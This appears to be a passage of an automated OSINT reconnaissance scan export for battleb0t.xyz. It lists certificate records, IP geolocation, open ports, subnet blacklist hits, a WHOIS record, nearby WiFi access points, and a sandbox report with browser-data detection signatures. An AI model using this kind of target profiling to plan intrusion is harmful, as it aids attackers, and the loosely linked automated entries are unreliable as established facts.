u'8146e2bbb69c6bf3a769558c8c5ae10b8e6243d42611ba7db2c4f0b16bf71146', u'id': u'4865007011', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'5a0559923d0fdaac1fc6a74472ffcb94c92e25a29d8d9a48166bcad2947f18e1', u'cert_sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'revoked': False, u'not_after': u'2023-05-25T03:05:10Z', u'not_before': u'2023-02-24T03:05:11Z', u'cert': {u'data': u'MIIFMTCCBBmgAwIBAgISBJEIZbRWlOOJN2vI7lr89IBSMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMzAyMjQwMzA1MTFaFw0yMzA1MjUwMzA1MTBaMCExHzAdBgNVBAMTFm9sZGZsdWlkLmJhdHRsZWIwdC54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCXS5qUM658XpEb2FQiye1Pjdwc6oLnwWa4DnrXaX6XESwapQ5kFhLVlLMj8jbUT+vVMlCs5NdmG+PakXkEZvQt+j5F9EiRGo2AgsrdZhjN8p2HDZYJNvCQUHSzj9HUq+U8uqatV2IiK2DebnYEAl36UoC3YWvKiQ5ROMPyTcGPPlwvhux67sSpCWf+OjYs9HHdY1LHfiQTO/hkrA8XZYtPEtu6i5bXp9Nc/Y/pJrDB086upICbjZsf9spKiE++7SgvRRKN7ShK4dcK0cxPOA/6ky2NSpI6iIIBJKdiUpWIy/Uh604fFFn7oPNTbG4g4coLg0Y2NMYiFxvY5oIkaMplAgMBAAGjggJQMIICTDAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFNUp10YCZXNl/PWnfC5vlnnYZ6TmMB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMCEGA1UdEQQaMBiCFm9sZGZsdWlkLmJhdHRsZWIwdC54eXowTAYDVR0gBEUwQzAIBgZngQwBAgEwNwYLKwYBBAGC3xMBAQEwKDAmBggrBgEFBQcCARYaaHR0cDovL2Nwcy5sZXRzZW5jcnlwdC5vcmcwggEDBgorBgEEAdZ5AgQCBIH0BIHxAO8AdgC3Pvsk35xNunXyOcW6WPRsXfxCz3qfNcSeHQmBJe20mQAAAYaBmKzyAAAEAwBHMEUCICWgaft/PmN9oILwvZn6/4Qgr8WGgSRL98ur+169a4dWAiEAilZEKCsL5dY69BV+Cjy6gEc40xNl1o6o5QEE0+3XKCQAdQB6MoxU2LcttiDqOOBSHumEFnAyE4VNO9IrwTpXo1LrUgAAAYaBmK0EAAAEAwBGMEQCIEhQdyenjelORFvktFZQ+yD8yP0PS9xoCKRWpUv1pUezAiBBtKAPIhxp6PP7YLKBYWLg3Sg3E350KyZ04f3lTSlh5zANBgkqhkiG9w0BAQsFAAOCAQEAYbTvc/w81jb1dYAMM4uaBQvE73IdaXSV/QqEvbi5PBKH0+sttdJjKilgWcQRHA/D+3kvikNXOGLYLmg0u2wOeuP4PfXBBaVtk7mzSCKOozlm5qWe3OKYNX6z4ceyFrewLnBQTuqT0PhcaWwb0j7u2mQfrZfIvhc4pu2SnjvbZ8iwX+av/fdXknuHPb/EwSETusTYhaNj3JDu3z0qvANOuhuMDBZ+WOOsf9w7QBgfdJjVxPoymZWgZB5bTaj1eTMuP0PcjQ59KCV0epMnUy5rrk2BwTzgzUICbfza81JX1bFwjhqRFcgbk81AuP8p58YFrWOMyOzX6Ygzo11DodW5IA==', u'sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'type': u'cert'}, u'dns_names': [u'oldfluid.battleb0t.xyz'], u'tbs_sha256': u'11231ecf169618aac453b5e600bca74016c90998389238bc78e25a336ea53b60', u'id': u'4865013513', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'b65f3ba1cf72aeba89e3a802dee04c06a05e779c0cfeacdd6cb8cefb55c4e2da', u'cert_sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'revoked': False, u'not_after': u'2023-05-26T01:39:24Z', u'not_before': u'2023-02-25T01:39:25Z', u'cert': {u'data': u'MIIFNTCCBB2gAwIBAgISBLY5M6/eHjLz/C523LwIUYYQMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMzAyMjUwMTM5MjVaFw0yMzA1MjYwMTM5MjRaMBgxFjAUBgNVBAMTDWJhdHRsZWIwdC54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCrxxsM7cYB+Oqps88IF0+iy3w0xGYS5u/zmBd5yWXuZkwfmpJ9M+4H+i4VYve08x/VTy6xZ6hJQr/jzJq3MEbCaPUoqWRpb0xLZCTJ3O1Gn6Qfwu9vNtC8aSe44tYYcEAstPXuj/cNjG4Dkudd1j68u8lbKBCgWvY39eGeFSNybo5pAQmkjKTJ19sFAZBIS5AgjDh6CmB0eRgmMI5gCxe5JKCA3z8UANMJ5zRHNWN8VNKgneFX0csT0zwwJJeO6jQAn8xsDGr3VLxeYNxGMcIJ3tnD42MejxzFkJDo2oa+ffHDHxqGaZsL4LIMRwjIklkrZi/6oTihLxBl9pf9FoczAgMBAAGjggJdMIICWTAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFGNOFYVWWqSUAsIWQqSll5o4AleXMB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMCsGA1UdEQQkMCKCDWJhdHRsZWIwdC54eXqCEXd3dy5iYXR0bGViMHQueHl6MEwGA1UdIARFMEMwCAYGZ4EMAQIBMDcGCysGAQQBgt8TAQEBMCgwJgYIKwYBBQUHAgEWGmh0dHA6Ly9jcHMubGV0c2VuY3J5cHQub3JnMIIBBgYKKwYBBAHWeQIEAgSB9wSB9ADyAHcAejKMVNi3LbYg6jjgUh7phBZwMhOFTTvSK8E6V6NS61IAAAGGhnCAVAAABAMASDBGAiEAh/Y8suDCe/RZMkn/hO7hrF2hfoTeuKySO5eYbccRB9ACIQCOoXkcH72OFd6rl/5A4dnCHD5VPTnfiLg+MDLqz1Gg8wB3AOg+0No+9QY1MudXKLyJa8kD08vREWvs62nhd31tBr1uAAABhoZwgDYAAAQDAEgwRgIhAMDKSjoBecX3TRhscOh0pPwxXkb/27xVeRxr0yp3M5J9AiEAs2yzzZRuQAdUQ84z4D/CSUjcGSNE5J2LfuF/Rs4Y77YwDQYJKoZIhvcNAQELBQADggEBALLjqCzluns+jvveBcnb3xDhOkrUyOkWdjExuB2H40IVXNkB0eMhFJYNA9arKrtu2pcQ/rEDSKt+bXuWbeA6WumULoOuP6iljCU6qcUdY4oNVU1UyDoX1HJydnidKSo73vUKTNhEgh8aKcxcLL9+23F8UOOR/pU/04dfMDdI7GO2oawzrGMFso9t7p4urFBZ6UFG0nFlBRdC2T4hndeQOaaPLehK1P9tnjLGggWPpLV0tHDfKEtQyBs2Gq7Pe6uSI+Z3l/JHpLBS8p3PvmiiivIv8GYL0zQqx4o1xBwzLeWQ3lanl4Z8l8lFj5lhIgA9qrKHDTW7TPP4HPiZwejRMMY=', u'sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'type': u'cert'}, u'dns_names': [u'battleb0t.xyz', u'www.battleb0t.xyz'], u'tbs_sha256': u'5d9c34221e2de124f32114bf34c005fc414285d1b7cc7cab0bb0bd4e745c7797', u'id': u'4869370950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afa |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/jcqn.jpg | https://pics.battleb0t.xyz/ |
| 2023-05-12 02:46:02 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 3 | 0 | None | {u'city': u'North Charleston', u'security': {u'is_vpn': False}, u'city_geoname_id': 4589387, u'region_geoname_id': 4597040, u'country': u'United States', u'region': u'South Carolina', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'GOOGLE-CLOUD-PLATFORM', u'isp_name': u'Google LLC', u'organization_name': u'Google LLC', u'autonomous_system_number': 396982}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'29415', u'longitude': -79.9746, u'country_code': u'US', u'timezone': {u'abbreviation': u'EDT', u'gmt_offset': -4, u'is_dst': True, u'name': u'America/New_York', u'current_time': u'22:46:01'}, u'latitude': 32.8608, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'35.229.48.116', u'continent': u'North America', u'region_iso_code': u'SC'} | 35.229.48.116 |
| 2023-05-12 03:01:34 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.106): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | public (Category: finance)
https://public.com/@login | login |
| 2023-05-12 03:32:21 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.11:443 | 188.114.97.0/24 |
| 2023-05-12 02:55:05 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.97.1:2095 | 188.114.97.1 |
| 2023-05-12 02:44:05 | Raw Data from RIRs | No | Tool - WAFW00F | 0 | 0 | 1 | 0 | None | [{"url": "https://ayhu.xyz", "firewall": "Cloudflare", "detected": true, "manufacturer": "Cloudflare Inc."}, {"url": "https://ayhu.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] | ayhu.xyz |
| 2023-05-12 03:31:30 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 7 | 0 | None | 589e2ad15175f1c51c0a91d29b753337-1077158@contact.gandi.net | Domain Name: TELLERIA.COM
Registry Domain ID: 1147715746_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2022-06-03T06:12:07Z
Creation Date: 2007-08-11T18:34:23Z
Registry Expiry Date: 2023-08-11T18:34:23Z
Registrar: Gandi SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: NS-222-C.GANDI.NET
Name Server: NS-49-A.GANDI.NET
Name Server: NS-89-B.GANDI.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: telleria.com
Registry Domain ID: 1147715746_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2022-06-03T06:12:07Z
Creation Date: 2007-08-11T16:34:23Z
Registrar Registration Expiration Date: 2023-08-11T18:34:23Z
Registrar: GANDI SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Reseller: CodeSyntax
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Domain Status:
Domain Status:
Domain Status:
Domain Status:
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Marcajes Telleria S.L.
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province:
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: ES
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext:
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext:
Registrant Email: 589e2ad15175f1c51c0a91d29b753337-1077158@contact.gandi.net
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext:
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext:
Admin Email: 098cbf54d6bdbb0fbdb022d1da6e4300-356617@contact.gandi.net
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext:
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext:
Tech Email: 098cbf54d6bdbb0fbdb022d1da6e4300-356617@contact.gandi.net
Name Server: NS-49-A.GANDI.NET
Name Server: NS-89-B.GANDI.NET
Name Server: NS-222-C.GANDI.NET
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:15Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/epp
Reseller Email:
Reseller URL: http://www.codesyntax.com/
Personal data access and use are governed by French law, any use for the purpose of unsolicited mass commercial advertising as well as any mass or automated inquiries (for any intent other than the registration or modification of a domain name) are strictly forbidden. Copy of whole or part of our database without Gandi's endorsement is strictly forbidden.
A dispute over the ownership of a domain name may be subject to the alternate procedure established by the Registry in question or brought before the courts.
For additional information, please contact us via the following form:
https://www.gandi.net/support/contacter/mail/
|
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 0d70cf (Net ID: 00:02:2D:0D:70:CF) | 37.7642, -122.3993 |
| 2023-05-12 03:00:51 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.73): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | SMG (Net ID: 00:0C:41:BD:EA:B0) | 39.0469, -77.4903 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | tsunami (Net ID: 00:0D:28:68:59:E3) | 32.8608, -79.9746 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | linksys (Net ID: 00:18:39:2C:B7:B2) | 40.2024, 29.0398 |
| 2023-05-12 02:44:05 | SSL Certificate - Issued by | No | CertSpotter | 0 | 0 | 1 | 0 | None | C=US,O=Let's Encrypt,CN=R3 | battleb0t.xyz |
| 2023-05-12 02:54:20 | HTTP Headers | No | Web Spider | 2 | 0 | 4 | 0 | None | {"content-length": "243", "accept-ranges": "bytes", "strict-transport-security": "max-age=31536000", "server": "Netlify", "etag": "\"c575cbc28e14cae03836d1d0fc69c052-ssl\"", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:20 GMT", "x-nf-request-id": "01H06Y2YH7X6V06YSWWEW2NH9C", "content-type": "text/css; charset=UTF-8", "age": "0"} | https://funny.battleb0t.xyz/gallery.css |
| 2023-05-12 02:45:44 | Physical Location | No | MetaDefender | 0 | 0 | 2 | 0 | None | San Francisco, United States | 185.199.109.153 |
| 2023-05-12 03:01:17 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.150): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:44:25 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | funny.battleb0t.xyz | CN=funny.battleb0t.xyz |
| 2023-05-12 02:56:53 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 14, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://www.bancociudad.com.ar/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"8.243.10.90:443"\n "104.18.32.68:80"\n "104.17.25.14:443"\n "142.250.188.234:443"\n "142.250.72.227:443"\n "142.250.72.168:443"\n "142.250.72.131:443"\n "23.111.9.57:443"\n "172.64.133.15:443"\n "142.250.68.14:443"\n "142.250.189.6:443"\n "142.250.72.226:443"\n "142.250.189.14:443"\n "142.250.217.130:443"\n "157.240.254.7:443"\n "146.75.92.157:443"\n "13.227.44.24:443"\n "172.67.69.156:443"\n "35.186.248.98:443"\n "216.239.34.181:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"bancociudad.com.ar"\n "browser-update.org"\n "cdn-widgets.chattigo.com"\n "cdnjs.cloudflare.com"\n "config-global.chattigo.com"\n "ocsp.sectigo.com"\n "static.ads-twitter.com"\n "twemoji.maxcdn.com"\n "use.fontawesome.com"\n "www.bancociudad.com.ar"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3348:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "Local\\SM0:6324:304:WilStaging_02"\n "Local\\SM0:6324:120:WilError_01"\n "Local\\InternetShortcutMutex"\n "Local\\SM0:3348:120:WilError_01"\n "Local\\SM0:3348:304:WilStaging_02"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3348:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:2940:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ocsp.sectigo.com"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"29c3c455eb0ebe5b_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\29c3c455eb0ebe5b_0]- [targetUID: 00000000-00003348]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sync Data\\LevelDB\\000003.log]- [targetUID: 00000000-00003348]\n "f_00024d" has type "ASCII text with very long lines with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00024d]- [targetUID: 00000000-00004292]\n "f_000268" has type "JPEG image data baseline precision 8 960x420 components 3"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_000268]- [targetUID: 00000000-00004292]\n "dc024e37-24d7-4619-b791-203aee584692.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 53900"- Location: [%TEMP%\\dc024e37-24d7-4619-b791-203aee584692.tmp]- [targetUID: 00000000-00003348]\n "Tabs_13313178968803289" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sessions\\Tabs_13313178968803289]- [targetUID: 00000000-00003348]\n "765cfe4494a18824_0" has type "data"- [targetUID: N/A]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00003348]\n "e3c33c80-9437-442d-879c-95d0314ecde7.tmp" has type "very short file (no magic)"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\e3c33c80-9437-442d-879c-95d0314ecde7.tmp]- [targetUID: 00000000-00003348]\n "f_00023e" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023e]- [targetUID: 00000000-00004292]\n "2ad8c636674bcc14_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\2ad8c636674bcc14_0]- [targetUID: 00000000-00003348]\n "f_000284" has type "Ogg data Vorbis audio stereo 44100 Hz ~96000 bps"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_000284]- [targetUID: 00000000-00004292]\n "4e8147e4f545a47c_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\4e8147e4f545a47c_0]- [targetUID: 00000000-00003348]\n "91369cf243ec2070_0" has type "data"- [targetUID: N/A]\n "f_000243" has type "TrueType Font data 11 tables 1st "OS/2" 14 names Macintosh type 1 string icomoon "- [targetUID: N/A]\n "2d8883836df10fc0_0" has type "data"- [targetUID: N/A]\n "f_00023d" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023d]- [targetUID: 00000000-00004292]\n "f1de57bd-9604-4dcb-9e44-716a69cec2a9.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\f1de57bd-9604-4dcb-9e44-716a69cec2a9.tmp]- [targetUID: 00000000-00004292]\n "4af3c85af602fe93_0" has type "data"- [targetUID: N/A]\n "c1970b30fb6d8527_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\c1970b30fb6d8527_0]- [targetUID: 00000000-00003348]'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"static.ads-twitter.com" (Indicator: "twitter")'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://www.bancociudad.com.ar/"\n Pattern match: "https://www.bancociudad.com.ar"\n Heuristic match: "ocsp.sectigo.com"\n Heuristic match: "GET /MFIwUDBOMEwwSjAJBgUrDgMCGgUABBS83pEmglYTXfyF78OS%2BRiTRWadkgQULGn%2FgMmHkK404bTnTJOFmUDpp7ICEQC2rT5BoDb95aPVWokq%2BuwL HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/10.0\nHost: ocsp.sectigo.com"\n Heuristic match: "bancociudad.com.ar"\n Heuristic match: "browser-update.org"\n Heuristic match: "cdn-widgets.chattigo.com"\n Heuristic match: "cdnjs.cloudflare.com"\n Heuristic match: "config-global.chattigo.com"\n Heuristic match: "static.ads-twitter.com"\n Heuristic match: "twemoji.maxcdn.com"\n Heuristic match: "use.fontawesome.com"\n Pattern match: "www.bancociudad.com.ar"\n Pattern match: ".bancociudad.com.ar/\'i1s;itu;\';__\'il/"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"cdnjs.cloudflare.com" seems to be random\n "twemoji.maxcdn.com" seems to be random'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/92 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'File/Memory', u'identifier': u'string-93', u'name': u'Found browser information locations related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1005', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1005', u'relevance': 5, u'threat_level': 1, u'type': 2, u'description': u'"C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00003348-0000044C-1273661857\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\OptimizationGuidePredictionModels" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00003348-00000BE4-7938540729\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\EdgePushStorageWithConnectTokens" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00003348-00000BE4-8638274333\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\blob_storage\\d0313995-11ad-4fbc-ac47-fb134ed2e3e0" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00003348-00000BE6-25412996207\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\blob_storage\\d29bc76d-2b8d-4a95-80d7-f22f79c87d73" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00003348-00000BE4-25414099115\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Bookmarks" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00003348-00000BE2-426277081165 | 35.229.48.116 |
